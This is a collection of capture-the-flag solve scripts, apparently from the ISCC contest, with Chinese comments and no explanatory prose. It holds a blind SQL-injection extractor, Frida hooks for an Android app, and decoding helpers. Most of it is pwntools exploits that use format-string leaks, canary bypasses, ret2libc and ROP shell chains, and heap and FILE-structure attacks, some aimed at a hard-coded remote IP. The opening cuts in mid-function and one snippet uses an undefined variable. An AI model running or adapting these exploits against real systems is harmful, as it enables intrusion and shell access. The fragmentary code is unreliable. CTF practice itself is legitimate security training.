        if char is None:
            result += f"{{{i}}}" else:
                result += char
                return result
            
def get_tables_name():
    payload = "(select group_concat(tbl_name) from sqlite_master wheretype='table' and tbl_name NOT like 'sqlite_%')"
    length = get_length(payload)
    result = get_value(payload, length)
    return result

def get_schema(table_name):
    payload = f"(select group_concat(sql) from sqlite_master where type='table' and name='{table_name}')"
    length = get_length(payload)
    result = get_value(payload, length)
    return result

def get_data(table_name, column_name):
    payload = f"(select group_concat({column_name}) from {table_name})"
    length = get_length(payload)
    result = get_value(payload, length)
    return result

def get_flag():
    result = ""
    for i in range(1, 14):
        payload = "(select group_concat(flag) from flag)"
        result += get_char(payload, i)
        return result
    
def main():
    print(get_flag())
    # get_data('flag', 'flag')

if __name__ == "__main__":
    main()

print("evil"*len('";s:8:"awarding";s:7:"pennant";}'))

from ctypes import *
import base64
a = lambda x: [ord(i) for i in x]
b = lambda x: base64.b64encode(bytes(x)).decode()
c = lambda x: [c_uint8(i).value for i in x]
enc0 = a("04999999gwC9nOCNUhsHqZm")
p = c([56, 88, 36, -37, -15, -20, 48, 67, 51, -86, 122, -114, -76, 78, 63, 71])
for i in range(len(enc0)):
    enc0[i] ^= p[i % len(p)]
mn = a(b(p + enc0))

for i in range(len(mn)):
    mn[i] += 0x7f
    mn[i] &= 0xff

for i in range(len(mn)):
    if i & 1 == 0:
        mn[i] ^= 0x7b
    else:
        mn[i] ^= 0xea
print("ISCC{"+b(mn)[:32]+"}")

import frida, sys

jscode = """
Java.perform(function () {
    var MainActivity = Java.use("com.example.challengemobile.MainActivity");

    MainActivity.a.implementation = function (bArr) {
        var result = this.a(bArr);
        console.log("res: ", result);
        return result;
    };
});

"""


def message (message, data):
    if message["type"] == 'send':
        print("[*] {0}".format(message['payload']))
    else:
        print(message)

process = frida.get_remote_device().attach('challengemobile')
script= process.create_script(jscode)
script.on("message", message)
script.load()
sys.stdin.read()

import frida, sys

jscode = """
function main() {
    Java.perform(function () {
        var ClassUse = Java.use("java.lang.Class");
        var dexclassLoader = Java.use("dalvik.system.DexClassLoader");
        dexclassLoader.loadClass.overload("java.lang.String", "boolean").implementation =
            function (name, initialize) {
                console.log("Loading class:", name);  // Debug: 输出尝试加载的类名
                var result = this.loadClass(name, initialize);

                if (name === "com.example.challengemobile.Checker") {
                    console.log("Found target class:", name);  // Debug: 确认找到目标类
                    var hookClass = result;
                    var hookClassCast = Java.cast(hookClass, ClassUse);
                    try {
                        var method = hookClassCast.getMethod("getKey", []);
                        var keyResult = method.invoke(null, []);
                        console.log("Key obtained:", keyResult);  // 输出getKey的结果
                        return keyResult;
                    } catch (e) {
                        console.log("Error during method invocation:", e);  // 如果getMethod或invoke出错，输出错误信息
                    }
                }
                return result;
            };
    });
}

setImmediate(main);
"""

def message (message, data):
    if message["type"] == 'send':
        print("[*] {0}".format(message['payload']))
    else:
        print(message)

process = frida.get_remote_device().attach('challengemobile')
script= process.create_script(jscode)
script.on("message", message)
script.load()
sys.stdin.read()

import xxtea

# 填入数据
key1 = b''
encrypted_data = b''

decrypted_data = xxtea.decrypt(encrypted_data, key,padding=False)

print(decrypted_data)

from Crypto.Util.number import long_to_bytes

# 定义 Base58 字符集
BASE58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# 待解码的消息
ENCODED_MESSAGE = "3SRNH1pdcta4283rFzAHxvZOLjIizbJ64UFx"

# 初始化解码结果列表，长度与原消息相同
decoded_results = ["1"] * len(ENCODED_MESSAGE)

def base58_to_decimal(encoded_string):
    """
    将 Base58 编码的字符串转换为其十进制表示。
    """
    base = 58
    decimal_value = 0
    power = 0
    for char in reversed(encoded_string):
        digit = BASE58_ALPHABET.index(char)
        decimal_value += digit * (base ** power)
        power += 1
    return decimal_value

# 遍历偏移量 k，尝试解码
for offset in range(26):
    try:
        # 重新初始化解码结果列表，避免之前迭代的影响
        decoded_chars = ["1"] * len(ENCODED_MESSAGE)
        
        # 解码过程
        for index, char in enumerate(ENCODED_MESSAGE):
            if char.isdigit():
                decoded_chars[index] = char
            elif char.islower():
                decoded_chars[index] = chr((ord(char) - 97 + offset) % 26 + 97)
            elif char.isupper():
                decoded_chars[index] = chr((ord(char) - 65 + offset) % 26 + 65)
        
        # 合并解码后的字符列表为字符串
        modified_message = "".join(decoded_chars)
        
        # 转换为十进制并尝试打印解码结果
        print(offset, long_to_bytes(base58_to_decimal(modified_message)))
    except ValueError:  # 更具体的异常处理，当字符不在 BASE58 集合中时抛出
        pass

from pwn import *
p = remote("xxxx",[port])

p.recvuntil(b"Choice")
p.sendline(b'5')

p.recvuntil(b"Chunk size")
p.sendline(b'104')

p.recvuntil(b'Content')
p.sendline(b'Flag')

p.interactive()

from pwn import *

p = remote('xxxx',[port])
libc = ELF('./libc6-i386_2.31-0ubuntu9.14_amd64.so')

p.recvuntil(b"Let's have fun!\n")
x = 0x804C030
payload = fmtstr_payload(4, {x: 5}) + b'%15$p'
p.send(payload)

p.recvuntil(b'0x')
libc_addr = int(p.recv(8), 16)
libcbase = libc_addr - libc.sym['__libc_start_main'] - 0XF5
log.info('libcbase: ' + hex(libcbase))

system = libcbase + libc.symbols['system']
str_bin_sh = libcbase + next(libc.search(b'/bin/sh'))
payload = b'a' * (0x90 + 0x4) + p32(system) + p32(0x0) + p32(str_bin_sh)
p.recvuntil(b'Input')
p.sendline(payload)

p.interactive()

from pwn import *
p = remote('xxxx',[port])
elf = ELF('./easyshell')
p.recvuntil(">>")
pay=b'flagisaaa%15$p%17$p'
p.sendline(pay)
p.recvuntil("0x")
canary=int(p.recv(16),16)
p.recvuntil("0x")
pie=int(p.recv(12),16)-0x1422-254
p.recvuntil(">>")
pay=(b'exit').ljust(0x38)+p64(canary)*2+p64(pie+0x1291)
p.sendline(pay)
p.recvuntil(">>")
p.sendline(b'exit')
p.interactive()

from pwn import *
from LibcSearcher import *
elf=ELF("./miao")
io=remote("xxxx",[port])
io.recvuntil(b"?\n")
io.sendline(b"%31$p") 
io.recvuntil(b"0x")
canary=int(io.recv(8),16)
print(hex(canary))
eax=0x080b8666
ebx_edx=0x0806f309
ecx=0x080def3d
bin_sh=0x80BB7C8
int_80=0x0806cf83
payload=b"a"*0x64+p32(canary)
payload=payload.ljust(0x74,b"a")
payload+=p32(eax)+p32(0xb)+p32(ebx_edx)+p32(bin_sh)+p32(0)+p32(ecx)+p32(0)+p32(int_80)
io.sendline(payload)
io.interactive()

from pwn import *
from LibcSearcher import *
x=int(input("请选择模式\n1:远程攻击\n2:本地攻击\n3:exp调试\n"))
if x == 1:
    r=remote("xxxx",[port])
    context(os='linux',arch="i386",log_level='debug')
elif x == 2 :
    r=process("./iscc/attachment-13")
    context(os='linux',arch="i386",log_level='debug')
elif x == 3:
    r=gdb.debug("./iscc/attachment-12",gdbscript="b *0x804940c")
elf=ELF('./iscc/attachment-12')
libc=ELF('./libc/ret2-csu-libc.so.6')
puts_plt=elf.plt['write']
puts_got=elf.got['write']
back=0x804931b
r.sendlineafter("what's the content?\n",'%19$p')
r.recvuntil("Your answered:\n")
canary=int(r.recv(10),16)
print("canary------>"+str(hex(canary)))
p=flat(b'a'*(0x88),canary,b'aaaa',canary,b'aaaa',puts_plt,back,1,puts_got,8)
r.sendlineafter("Input:\n",p)
write_addr=u32(r.recv(4))
print("puts_addr------->"+str(hex(write_addr)))
libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
# libc_base=write_addr-libc.symbols['write']
system=libc_base+libc.dump("system")
sh=libc_base+libc.dump('str_bin_sh')
p=flat(b'a'*(0x88),canary,b'aaaa',canary,b'aaaa',system,'aaaa',sh) 
r.sendline(p)
r.interactive()

import time
from pwn import *

# 设置架构和日志级别
context.arch = "amd64"
context.log_level = "debug"

# 连接到远程进程
# p = process("./your_program")
p = remote("182.92.237.102", 10032)

# 加载ELF文件以获取符号信息
elf = ELF("./your_program")

# 定义辅助函数
def leak_address(p, num_bytes=6):
    """Leak memory address by receiving data until '\x7f' is encountered."""
    data = p.recvuntil(b'\x7f')
    return u64(data[-num_bytes:].ljust(8, b'\x00'))

# 地址定义
printf_got = elf.got['printf']
printf_plt = elf.plt['printf']
puts_plt = elf.plt['puts']
pop_rdi_ret = 0x0000000000401763
ret_address = 0x000000000040101a
main_address = 0x00000000004014C8
auth_address = 0x000000000040127A  # Overflow detected here
overflow_variable = 0x0000000000403668

# 构造利用key
key_payload = b"A"*32 + p64(0) + p64(pop_rdi_ret) + p64(printf_got) + p64(puts_plt) + p64(main_address)
p.sendlineafter("Enter key:", key_payload)

# 获取printf地址
printf_leaked = leak_address(p)
log.info(f"printf address: {hex(printf_leaked)}")

# 计算libc基址
libc_base = printf_leaked - 0x061c90
system_address = libc_base + 0x052290

# 准备格式化字符串攻击
def exploit_format_string(payload):
    """Send payload to trigger format string vulnerability."""
    p.sendlineafter(">", b"2")
    p.sendline(payload)

# 清除操作
def clear_app(choice=b'n'):
    """Option to clear or stay in the app."""
    p.sendlineafter(">", b"4")
    p.sendlineafter("Are you sure you want to exit? (y/n)", choice)

# Request heap allocation
def request_heap_allocation(payload):
    """Request heap allocation and write content."""
    p.sendlineafter(">", b"3")
    p.sendline(payload)

# Offset calculation and initial key setup
offset = 6
initial_key = b"A"*28
p.sendlineafter("Enter key:", initial_key)
p.sendlineafter("Welcome to ISCC, tell me your name:", b"hacker")

# Leaking heap base address
format_payload = b"%7$s".ljust(8, b'\xff') + p64(overflow_variable)
exploit_format_string(format_payload)
p.recvuntil("hello hack\n")
heap_base = u64(p.recvuntil(b'\xff')[:-1].ljust(8, b'\x00'))
log.info(f"Heap base: {hex(heap_base)}")

# Clearing app state
clear_app(b'\x24')
clear_app()

# Prepare for system call
request_heap_allocation(p64(0)*3 + p64(system_address))

# Overwrite heap to redirect flow
overwrite_payload = f"%{0x3024}c%9$hn".encode().ljust(0x18, b'\xff') + p64(heap_base)
exploit_format_string(overwrite_payload)

log.info(f"Libc base: {hex(libc_base)}")
# Interactive shell
p.interactive()

from pwn import *
p = remote('182.92.237.102', 10016)
libc = ELF('./libc6-i386_2.31-0ubuntu9.14_amd64.so')
def create(Size, Content=b'a'):
    p.recvuntil(b'choice')
    p.sendline(b'1')
    p.recvuntil(b'size')
    p.sendline(bytes(str(Size), 'utf-8'))
    p.recvuntil(b'Content')
    p.send(Content)
def free(id):
    p.recvuntil(b'choice')
    p.sendline(b'2')
    p.recvuntil(b'Index')
    p.sendline(bytes(str(id), 'utf-8'))
def show(id):
    p.recvuntil(b'choice')
    p.sendline(b'3')
    p.recvuntil(b'Index')
    p.sendline(bytes(str(id), 'utf-8'))
create(0x500)
create(0x20)
free(0)
create(0x500, b'a' * 4)
show(0)
libc_addr = u32(p.recvuntil(b'\xf7')[-4:])
malloc_hook = libc_addr - 0x38 - 0x18
libcbase = malloc_hook - libc.symbols['__malloc_hook']
system = libcbase + libc.symbols['system'] + 1
puts = libcbase + libc.symbols['puts']
success('malloc_hook ' + hex(malloc_hook))
success('libcbase ' + hex(libcbase))
free(1)
free(2)
create(0x8, p32(system) + b';sh;')
show(1)
p.sendline("cat${IFS}flag.txt")
p.interactive()

from pwn import *

p = remote("xxxx",[port])
libc = ELF("./libc.so.6")
elf = ELF('./CAT_DE')
context.update(arch='amd64', os='linux', log_level='debug')

def add(size, content):
    p.sendlineafter("car choice >> ", "1")
    p.sendlineafter("size:", str(size))
    p.sendafter("content:", content)

def edit(idx, content):
    p.sendlineafter("car choice >> ", "4")
    p.sendlineafter("idx:", str(idx))
    p.sendafter("content:", content)

def show(idx):
    p.sendlineafter("car choice >> ", "3")
    p.sendlineafter("idx:", str(idx))

def delete(idx):
    p.sendlineafter("car choice >> ", "2")
    p.sendlineafter("idx:", str(idx))

add(0x440, "AAA")
add(0x88, "AAA")
add(0x440, "AAAA")
add(0x88, "AAA")
delete(0)
delete(2)
add(0x450, "AAAA")
add(0x440, "AAAAAAAA")
add(0x440, "BBBBBBBB")
show(4)

p.recvuntil("\0")
libc.address = u64(p.recv(6).ljust(8, b"\x00")) - 0x21a000 - 0xe0
log.info("libc_base: " + hex(libc.address))

envrion = libc.sym['environ']
stdout = libc.sym['_IO_2_1_stdout_']
print(hex(libc.address))
p.recv(2)

heap_addr = u64(p.recv(8)) - 0x290
print(hex(heap_addr))

for i in range(7):
    add(0xf8, "AAA")

add(0x108, "AAA")
add(0xf0, "AAAA")
add(0x88, "AAA")

for i in range(7):
    delete(i + 5)

target = heap_addr + 0x17c0
ptr = heap_addr + 0xc60
edit(0, p64(target))
payload = p64(0) + p64(0x101) + p64(ptr - 0x18) + p64(ptr - 0x10)
payload = payload.ljust(0x100, b"\x00") + p64(0x100)
edit(12, payload)
delete(13)

add(0xe8, "AAAA")
add(0xe8, "AAAA")

delete(5)
delete(6)
show(12)
p.recvuntil("\xf1")
p.recv(7)
en_key = u64(p.recv(8))
print("en_key: " + hex(en_key))
key = u64(p.recv(8))
print("key: " + hex(key))
payload = p64(0) + p64(0xf1) + p64(en_key) + p64(key)
payload = payload.ljust(0xf0, b"\x00") + p64(0) + p64(0xf1) + p64((heap_addr + 0x10) ^ en_key)
edit(12, payload)

add(0xe8, "AAAA")
add(0xe8, p64(0) * 3 + p64(0x0000000700010001) + p64(0) * 24 + p64(envrion - 16))
print(hex(stdout))

add(0xd0, "A" * 8)
show(7)
stack = u64(p.recvuntil("\x7f")[-6:].ljust(8, b"\x00")) - 0x140 - 8
print(hex(stack))
edit(6, p64(0) * 3 + p64(0x0000000700010001) + p64(0) * 24 + p64(stack))

pop_rdi = 0x000000000002a3e5 + libc.address
pop_rsi = 0x000000000002be51 + libc.address
pop_rdx_r12 = 0x000000000011f497 + libc.address
read_addr = libc.sym['read']
open_addr = libc.sym['open']
write_addr = libc.sym['write']

orw = p64(pop_rdi) + p64(stack) + p64(pop_rsi) + p64(0) + p64(open_addr)
orw += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(stack + 0x100) + p64(pop_rdx_r12) + p64(0x30) + p64(0) + p64(read_addr)
orw += p64(pop_rdi) + p64(1) + p64(write_addr)
add(0xd0, b"./flag".ljust(8, b"\x00") + orw)

p.interactive()

from pwn import *

p = remote('xxxx', [port])
libc = ELF('./libc-2.31.so')
context.update(os='linux', arch='amd64', log_level='debug')

def create(idx, Size):
    p.recvuntil(b'choice')
    p.sendline(b'1')
    p.recvuntil(b'index')
    p.sendline(bytes(str(idx), 'utf-8'))
    p.recvuntil(b'Size')
    p.sendline(bytes(str(Size), 'utf-8'))


def free(id):
    p.recvuntil(b'choice')
    p.sendline(b'4')
    p.recvuntil(b'index')
    p.sendline(bytes(str(id), 'utf-8'))


def edit(id, Content):
    p.recvuntil(b'choice')
    p.sendline(b'3')
    p.recvuntil(b'index')
    p.sendline(bytes(str(id), 'utf-8'))
    p.recvuntil(b'context')
    p.send(Content)


def show(id):
    p.recvuntil(b'choice')
    p.sendline(b'2')
    p.recvuntil(b'index')
    p.sendline(bytes(str(id), 'utf-8'))


create(0, 0x420)
create(1, 0x410)
create(2, 0x410)
create(3, 0x410)
free(0)
show(0)

libc_add = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libcbase = libc_add - libc.symbols['__malloc_hook'] - 96 - 0x10
io_list_all = libcbase + 0x1ed5a0
log.info('libcbase ' + hex(libcbase))
log.info('io_list_all ' + hex(io_list_all))

create(4, 0x430)
edit(0, b'a' * (0x10 - 1) + b'A')
show(0)
p.recvuntil(b'A')
heap_add = u64(p.recvuntil(b'\n')[:-1].ljust(8, b'\x00'))
log.info('heap_add ' + hex(heap_add))

fd = libcbase + 0x1ecfd0
payload = p64(fd) * 2 + p64(heap_add) + p64(io_list_all - 0x20)
edit(0, payload)

free(2)
create(5, 0x470)
free(5)

openadd = libcbase + libc.sym['open']
readadd = libcbase + libc.sym['read']
writeadd = libcbase + libc.sym['write']
setcontextadd = libcbase + libc.sym['setcontext']
rdi = libcbase + 0x0000000000023b6a
rsi = libcbase + 0x000000000002601f
rdx_r12 = libcbase + 0x0000000000119431
ret = libcbase + 0x0000000000022679

chunk_small = heap_add + 0x850
IO_wfile_jumps = libcbase + 0x1e8f60
fakeIO_add = chunk_small
orw_add = fakeIO_add + 0x200
A = fakeIO_add + 0x40
B = fakeIO_add + 0xe8 + 0x40 - 0x68
C = fakeIO_add

fake_IO = b''
fake_IO = fake_IO.ljust(0x18, b'\x00')
fake_IO += p64(1)
fake_IO = fake_IO.ljust(0x78, b'\x00')
fake_IO += p64(fakeIO_add)
fake_IO = fake_IO.ljust(0x90, b'\x00')
fake_IO += p64(A)
fake_IO = fake_IO.ljust(0xc8, b'\x00')
fake_IO += p64(IO_wfile_jumps)
fake_IO += p64(orw_add) + p64(ret) + b'\x00' * 0x30
fake_IO += p64(B) + p64(setcontextadd + 61)

flag_add = orw_add + 0x100 + 0x10

orw = p64(rdi) + p64(flag_add) + p64(rsi) + p64(0) + p64(openadd)
orw += p64(rdi) + p64(3) + p64(rsi) + p64(flag_add) + p64(rdx_r12) + p64(0x50) + p64(0) + p64(readadd)
orw += p64(rdi) + p64(1) + p64(writeadd)

payload = fake_IO
payload = payload.ljust(0x200 - 0x10, b'\x00')
payload += orw
payload = payload.ljust(0x300, b'\x00')
payload += b'flag\x00'

edit(2, payload)

p.recvuntil(b'choice')
p.sendline(b'5')

p.interactive()